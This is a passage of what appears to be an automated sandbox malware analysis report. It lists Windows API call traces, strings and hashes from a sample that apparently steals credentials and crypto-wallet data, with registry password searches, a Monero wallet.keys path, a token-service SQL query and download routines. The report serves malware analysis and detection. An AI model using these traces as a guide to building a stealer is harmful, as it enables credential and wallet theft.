                               • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                              • String ID: %d MB$@
                              • API String ID: 2774356765-3474575989
                              • Opcode ID: c77d5160bdd87b00ed9b2e92be8bd04c36e70186c9c0c0825b934167462c6028
                              • Instruction ID: 00f8227bec764aa5c044994e60427cfc4bdd326b9b026d8d146876532eb5f935
                              • Opcode Fuzzy Hash: c77d5160bdd87b00ed9b2e92be8bd04c36e70186c9c0c0825b934167462c6028
                              • Instruction Fuzzy Hash: 5F218CB1E44209ABDB14DFD4DD4AFAEB7B8FB44B10F10421DF615BB280D778A9018BA5
                              APIs
                                • Part of subcall function 00FCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FCA7E6
                                • Part of subcall function 00FB47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00FB4839
                                • Part of subcall function 00FB47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00FB4849
                              • InternetOpenA.WININET(00FD0DF7,00000001,00000000,00000000,00000000), ref: 00FB610F
                              • StrCmpCA.SHLWAPI(?,00DEEA08), ref: 00FB6147
                              • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00FB618F
                              • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00FB61B3
                              • InternetReadFile.WININET(?,?,00000400,?), ref: 00FB61DC
                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00FB620A
                              • CloseHandle.KERNEL32(?,?,00000400), ref: 00FB6249
                              • InternetCloseHandle.WININET(?), ref: 00FB6253
                              • InternetCloseHandle.WININET(00000000), ref: 00FB6260
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                               • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                              • String ID:
                              • API String ID: 2507841554-0
                              • Opcode ID: 4541cf59bd92c7ac95b667c4b480d551da3a26fcc99383abbaa8b3b80e1910f7
                              • Instruction ID: b65d145182a00c5ee008aadc94df76d73bf74b2ba94291cc5c644902d26f0fb9
                              • Opcode Fuzzy Hash: 4541cf59bd92c7ac95b667c4b480d551da3a26fcc99383abbaa8b3b80e1910f7
                              • Instruction Fuzzy Hash: C8518EB1900208ABEF24DF51DD45FEE77B8FF04705F1081A8A60AA71C0DB796A85DF95
                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00FB733A
                              • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00FB73B1
                              • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00FB740D
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00FB7452
                              • HeapFree.KERNEL32(00000000), ref: 00FB7459
                              • task.LIBCPMTD ref: 00FB7555
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                               • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$EnumFreeOpenProcessValuetask
                              • String ID: Password
                              • API String ID: 775622407-3434357891
                              • Opcode ID: b66d33c03dbe9038ace781819b2810ee292cef585972a13295d1919912a2a705
                              • Instruction ID: ca6c004be3d4bf12ed9d75d0622ae9f63c8de8e69a5327280ad10a2a78b4ee86
                              • Opcode Fuzzy Hash: b66d33c03dbe9038ace781819b2810ee292cef585972a13295d1919912a2a705
                              • Instruction Fuzzy Hash: 70613BB5D04218DBDB24EB51DC41BDAB7BCBF84340F0481E9E649A6141DBB46BCADFA0
                              APIs
                                • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                                • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00DE8DF8,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
                                • Part of subcall function 00FCA9B0: lstrcpy.KERNEL32(00000000), ref: 00FCAA04
                                • Part of subcall function 00FCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FCAA12
                                • Part of subcall function 00FCA920: lstrcpy.KERNEL32(00000000,?), ref: 00FCA972
                                • Part of subcall function 00FCA920: lstrcat.KERNEL32(00000000), ref: 00FCA982
                                • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                                • Part of subcall function 00FCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FCA7E6
                              • lstrlen.KERNEL32(00000000), ref: 00FBBC9F
                                • Part of subcall function 00FC8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00FC8E52
                              • StrStrA.SHLWAPI(00000000,AccountId), ref: 00FBBCCD
                              • lstrlen.KERNEL32(00000000), ref: 00FBBDA5
                              • lstrlen.KERNEL32(00000000), ref: 00FBBDB9
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                              • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                              • API String ID: 3073930149-1079375795
                              • Opcode ID: fb89c1da0a3f09ae4bb1f766bb2946b1b60dede075dd9da8260d59b979a47bd9
                              • Instruction ID: a51ce2b73a4cf7ebe56c2d20a99202afffab2bc7b50eb761c0f66ca3273cba1f
                              • Opcode Fuzzy Hash: fb89c1da0a3f09ae4bb1f766bb2946b1b60dede075dd9da8260d59b979a47bd9
                              • Instruction Fuzzy Hash: 78B13C7191010DABDB18EBA0DE97EEE7339AF54304F40416DF506A2191EF387A49EB62
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess$DefaultLangUser
                              • String ID: *
                              • API String ID: 1494266314-163128923
                              • Opcode ID: b6794f2f294954c878756eb2de0bb20f6e40f75ada013123eab3e499736f3f08
                              • Instruction ID: bf75e267b24a55d6e94fc4aaaad23d767657d932b734e71f4e980dfafb790b36
                              • Opcode Fuzzy Hash: b6794f2f294954c878756eb2de0bb20f6e40f75ada013123eab3e499736f3f08
                              • Instruction Fuzzy Hash: 81F03A30908209EFD3589FE0B50AF2C7B74FF05703F0402ACE61A87284DA795A829BD5
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00FB4FCA
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00FB4FD1
                              • InternetOpenA.WININET(00FD0DDF,00000000,00000000,00000000,00000000), ref: 00FB4FEA
                              • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00FB5011
                              • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00FB5041
                              • InternetCloseHandle.WININET(?), ref: 00FB50B9
                              • InternetCloseHandle.WININET(?), ref: 00FB50C6
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                              • String ID:
                              • API String ID: 3066467675-0
                              • Opcode ID: 0d4131acf83250e7fe4ee9a6e87f334f2e9f93060b26cf9c1f800ea1f957dbaa
                              • Instruction ID: 75b6650f796c219e3f8e6668744a7d1a6a13765bea0bcb3780d55d2da0c441e5
                              • Opcode Fuzzy Hash: 0d4131acf83250e7fe4ee9a6e87f334f2e9f93060b26cf9c1f800ea1f957dbaa
                              • Instruction Fuzzy Hash: BD3127B5A00218ABCB24DF54DC85BDCB7B4EB48704F1081E9EB09A7284CB746EC59F98
                              APIs
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00FC8426
                              • wsprintfA.USER32 ref: 00FC8459
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00FC847B
                              • RegCloseKey.ADVAPI32(00000000), ref: 00FC848C
                              • RegCloseKey.ADVAPI32(00000000), ref: 00FC8499
                                • Part of subcall function 00FCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FCA7E6
                              • RegQueryValueExA.ADVAPI32(00000000,00DEDE90,00000000,000F003F,?,00000400), ref: 00FC84EC
                              • lstrlen.KERNEL32(?), ref: 00FC8501
                              • RegQueryValueExA.ADVAPI32(00000000,00DEDD58,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00FD0B34), ref: 00FC8599
                              • RegCloseKey.ADVAPI32(00000000), ref: 00FC8608
                              • RegCloseKey.ADVAPI32(00000000), ref: 00FC861A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                              • String ID: %s\%s
                              • API String ID: 3896182533-4073750446
                              • Opcode ID: 6e79f133d0271ac4b03d537eae4a36bb6873edd220c28fbc7d9adb41f3eb977e
                              • Instruction ID: a0f56f12b7bafc7a6723ede84cd0815d23656aed3b10fdc6d536dc5ab5ac88c8
                              • Opcode Fuzzy Hash: 6e79f133d0271ac4b03d537eae4a36bb6873edd220c28fbc7d9adb41f3eb977e
                              • Instruction Fuzzy Hash: F321F671900218ABDB28DB54DD85FE9B3B8FF48710F0081A9A609A7180DF75AA86DF94
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FC76A4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00FC76AB
                              • RegOpenKeyExA.ADVAPI32(80000002,00DDBCE0,00000000,00020119,00000000), ref: 00FC76DD
                              • RegQueryValueExA.ADVAPI32(00000000,00DEDF50,00000000,00000000,?,000000FF), ref: 00FC76FE
                              • RegCloseKey.ADVAPI32(00000000), ref: 00FC7708
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: Windows 11
                              • API String ID: 3225020163-2517555085
                              • Opcode ID: 75b613ee5e58426824e5107e93271ce694a4564e5babf4d62aa56dde8f58a476
                              • Instruction ID: b1cde68706288d3a1ac3c1337e2e66bc3273b450f7a8a01b84dc80f77cb100a5
                              • Opcode Fuzzy Hash: 75b613ee5e58426824e5107e93271ce694a4564e5babf4d62aa56dde8f58a476
                              • Instruction Fuzzy Hash: 2B018FB5A04309BBD714EBE0E94AF69B7B8EF48701F00406CFA19D7284D6B8A9409F50
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FC7734
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00FC773B
                              • RegOpenKeyExA.ADVAPI32(80000002,00DDBCE0,00000000,00020119,00FC76B9), ref: 00FC775B
                              • RegQueryValueExA.ADVAPI32(00FC76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00FC777A
                              • RegCloseKey.ADVAPI32(00FC76B9), ref: 00FC7784
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: CurrentBuildNumber
                              • API String ID: 3225020163-1022791448
                              • Opcode ID: fae3a863ae4e7840138d1a73af95a7e73b391f07716f227c5717ea9ff7f39994
                              • Instruction ID: fda3c497a9e31a172258c22a7ec3b588f8c14ddf4bbdc89e07348c5728351167
                              • Opcode Fuzzy Hash: fae3a863ae4e7840138d1a73af95a7e73b391f07716f227c5717ea9ff7f39994
                              • Instruction Fuzzy Hash: 1F0144B5A40308BBD714DBE0EC4AFAEB7B8EF48701F00416DFA19A7285DAB565408B51
                              APIs
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00FB99EC
                              • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00FB9A11
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00FB9A31
                              • ReadFile.KERNEL32(000000FF,?,00000000,00FB148F,00000000), ref: 00FB9A5A
                              • LocalFree.KERNEL32(00FB148F), ref: 00FB9A90
                              • CloseHandle.KERNEL32(000000FF), ref: 00FB9A9A
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                              • String ID:
                              • API String ID: 2311089104-0
                              • Opcode ID: 7ee98bfbb9c8651efb1669a9693e4432d7089b52c4d57a15c30d65af3cd732dc
                              • Instruction ID: 43a6e8938df574d92546ac7bce625e0e450e6e1e46110fc13c804e3c9ddeb89c
                              • Opcode Fuzzy Hash: 7ee98bfbb9c8651efb1669a9693e4432d7089b52c4d57a15c30d65af3cd732dc
                              • Instruction Fuzzy Hash: 8C313874E00209EFDB24CF95D985BEE77B8FF48310F108158E915A7290D778A981DFA0
                              APIs
                              • lstrcat.KERNEL32(?,00DEE028), ref: 00FC47DB
                                • Part of subcall function 00FC8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00FC8E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00FC4801
                              • lstrcat.KERNEL32(?,?), ref: 00FC4820
                              • lstrcat.KERNEL32(?,?), ref: 00FC4834
                              • lstrcat.KERNEL32(?,00DDAAD0), ref: 00FC4847
                              • lstrcat.KERNEL32(?,?), ref: 00FC485B
                              • lstrcat.KERNEL32(?,00DECDF0), ref: 00FC486F
                                • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                                • Part of subcall function 00FC8D90: GetFileAttributesA.KERNEL32(00000000,?,00FB1B54,?,?,00FD564C,?,?,00FD0E1F), ref: 00FC8D9F
                                • Part of subcall function 00FC4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00FC4580
                                • Part of subcall function 00FC4570: RtlAllocateHeap.NTDLL(00000000), ref: 00FC4587
                                • Part of subcall function 00FC4570: wsprintfA.USER32 ref: 00FC45A6
                                • Part of subcall function 00FC4570: FindFirstFileA.KERNEL32(?,?), ref: 00FC45BD
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmp
